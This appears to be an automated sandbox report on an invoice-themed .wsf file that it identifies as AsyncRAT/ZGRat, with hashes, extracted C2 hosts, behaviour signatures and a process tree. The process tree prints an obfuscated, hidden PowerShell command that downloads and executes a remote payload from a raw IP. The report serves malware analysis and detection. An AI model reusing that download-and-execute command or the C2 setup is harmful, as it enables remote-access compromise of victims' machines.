Analysis

  • max time kernel
    148s
  • max time network
    160s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231020-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231020-enlocale:en-usos:windows10-2004-x64system
  • submitted
    15/11/2023, 17:36

General

  • Target

    16112023_0136_15112023_Invoice#2356876431.wsf

  • Size

    21KB

  • MD5

    5d9bc7257648e766a56fa284fc93eb54

  • SHA1

    5ec96df82f7290ef18b15ce048e2f0cf49af523b

  • SHA256

    ce81111e3d8f1946ce876b32908560f51f3d43ab7e74706649e623462cada292

  • SHA512

    ada4abe483fb6df5422fb96f615e6fc67f08939d3d89a6ff2ad7b3f6e291a613789aa4b89925bbe9c450ba07b5f746dbe62b36cd25c3b28468c41d88fe9f1e06

  • SSDEEP

    384:taaaaaaaaaaauaaaaaaaaaaaVaaaaaaaaaaal0/OlaaaaaaaaaaaJaaaaaaaaaa9:taaaaaaaaaaauaaaaaaaaaaaVaaaaaaF

Malware Config

Extracted

Family

asyncrat

Version

| Edit 3LOSH RAT

Botnet

Sended@

C2

hexrxr.duckdns.org:6606

hexrxr.duckdns.org:7707

hexrxr.duckdns.org:8808

Mutex

AsyncMutex_85&$nkeo4%hifbe

Attributes
  • delay

    3

  • install

    false

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Detect ZGRat V1 1 IoCs
  • ZGRat

    ZGRat is remote access trojan written in C#.

  • Async RAT payload 1 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 14 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\16112023_0136_15112023_Invoice#2356876431.wsf"
    1⤵
    • Blocklisted process makes network request
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2500
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='/-/--/-/(''http://185.81.157.213:222/8X.jpg'')'.RePLACe('/-/--/-/','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789)
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4292
  • C:\Windows\system32\rundll32.exe
    "C:\Windows\system32\rundll32.exe" "C:\Windows\SYSTEM32\EDGEHTML.dll",#141 Microsoft.VCLibs.140.00_8wekyb3d8bbwe
    1⤵
      PID:4928
    • C:\Windows\System32\svchost.exe
      C:\Windows\System32\svchost.exe -k UnistackSvcGroup
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:4584
    • C:\Windows\System32\WScript.exe
      C:\Windows\System32\WScript.exe "C:\Users\Public\Conted.vbs"
      1⤵
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:3400
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Conted.bat" "
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1624
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\Conted.ps1'"
          3⤵
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1976
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of SetWindowsHookEx
            PID:3984

    Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

            Filesize

            2KB

            MD5

            2f57fde6b33e89a63cf0dfdd6e60a351

            SHA1

            445bf1b07223a04f8a159581a3d37d630273010f

            SHA256

            3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

            SHA512

            42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

            Filesize

            1KB

            MD5

            026d93a446c50e4ae9aa47a15d0e923f

            SHA1

            f8832c1a57c63bc1b085b10f39b69254e27b2fb8

            SHA256

            c06620ef42e09394b9fb9816937e9161cdb5740ad2c1a312f55483cbc2adf089

            SHA512

            009c2cc902b3c560f77f882d4cd432e6893c51b8932889a4de8b119933e6bb6a9c91948dbb7ec392e120dfadca0211134625ffd6252b261fc84af8e17fbc2181

          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_japlqqsa.qnw.ps1

            Filesize

            60B

            MD5

            d17fe0a3f47be24a6453e9ef58c94641

            SHA1

            6ab83620379fc69f80c0242105ddffd7d98d5d9d

            SHA256

            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

            SHA512

            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

          • C:\Users\Public\Conted.bat

            Filesize

            205B

            MD5

            759278dd3dc3679bf7efd1ec681c0aa1

            SHA1

            72b37494696deea940ac75b4c4e06e2b6ce419ef

            SHA256

            cba344447d8228d88c93d64ffdcda1de8562ef41adc4901191548e00bbfc5f19

            SHA512

            8b4f63354c5aa1ec4102e7aadbb2da34b2a0ba2d3ae6b8d22a70fd75c3c3b9e70cd4ce8128bd50cb400970697c49810c4ef69f96352e36ba4f2b7a647ab8a27f

          • C:\Users\Public\Conted.ps1

            Filesize

            422KB

            MD5

            ba03b4e7a4ad2bd4a2f5bce388d8f489

            SHA1

            f71681ee8115d4349084ad5c26e790a926bbea84

            SHA256

            d6b98f02b41a30cd4578acfd549e2d6fe64036f00c1830193d342c0454068b5a

            SHA512

            6dc307567baa0a1def8b9e480477985ccbdb7e5628c4d972a5804b282006d0717ddd728c449f8fbfcd2669a1a868c516d5924ab3a1f3d1b8e4bd1272fc04c665

          • C:\Users\Public\Conted.vbs

            Filesize

            688B

            MD5

            110da9d3474ba64fa1a18c173685c25d

            SHA1

            9f093829518a9268bf9807fda7bef47e7832c497

            SHA256

            a31dbd6f7416f150403c19be69f02d5e8608f5e7fae88a29831d40db15849b60

            SHA512

            ef5fb4415fbd12e633ad964ca132ac3be81bfacd489db788b86fc7ef245d6f51bc08faecaf24874649d0c754b1892075a28042bf8483ab85b1996a25cfa57443

          • memory/1976-79-0x00007FFA3F0E0000-0x00007FFA3FBA1000-memory.dmp

            Filesize

            10.8MB

          • memory/1976-76-0x000001EC79C70000-0x000001EC79C8A000-memory.dmp

            Filesize

            104KB

          • memory/1976-63-0x000001EC5F8D0000-0x000001EC5F8E0000-memory.dmp

            Filesize

            64KB

          • memory/1976-62-0x00007FFA3F0E0000-0x00007FFA3FBA1000-memory.dmp

            Filesize

            10.8MB

          • memory/3984-80-0x0000000075020000-0x00000000757D0000-memory.dmp

            Filesize

            7.7MB

          • memory/3984-82-0x0000000005C90000-0x0000000006234000-memory.dmp

            Filesize

            5.6MB

          • memory/3984-86-0x0000000006380000-0x00000000063E6000-memory.dmp

            Filesize

            408KB

          • memory/3984-85-0x0000000005BE0000-0x0000000005C7C000-memory.dmp

            Filesize

            624KB

          • memory/3984-84-0x0000000005810000-0x000000000581A000-memory.dmp

            Filesize

            40KB

          • memory/3984-83-0x0000000005880000-0x0000000005912000-memory.dmp

            Filesize

            584KB

          • memory/3984-81-0x00000000054D0000-0x00000000054E0000-memory.dmp

            Filesize

            64KB

          • memory/3984-77-0x0000000000400000-0x0000000000416000-memory.dmp

            Filesize

            88KB

          • memory/4292-14-0x0000024E330C0000-0x0000024E330D0000-memory.dmp

            Filesize

            64KB

          • memory/4292-15-0x0000024E330C0000-0x0000024E330D0000-memory.dmp

            Filesize

            64KB

          • memory/4292-13-0x00007FFA40290000-0x00007FFA40D51000-memory.dmp

            Filesize

            10.8MB

          • memory/4292-3-0x0000024E33070000-0x0000024E33092000-memory.dmp

            Filesize

            136KB

          • memory/4292-21-0x00007FFA40290000-0x00007FFA40D51000-memory.dmp

            Filesize

            10.8MB

          • memory/4584-58-0x000002A3D9FA0000-0x000002A3D9FA1000-memory.dmp

            Filesize

            4KB

          • memory/4584-38-0x000002A3D1B40000-0x000002A3D1B50000-memory.dmp

            Filesize

            64KB

          • memory/4584-54-0x000002A3D9E60000-0x000002A3D9E61000-memory.dmp

            Filesize

            4KB

          • memory/4584-56-0x000002A3D9E90000-0x000002A3D9E91000-memory.dmp

            Filesize

            4KB

          • memory/4584-57-0x000002A3D9E90000-0x000002A3D9E91000-memory.dmp

            Filesize

            4KB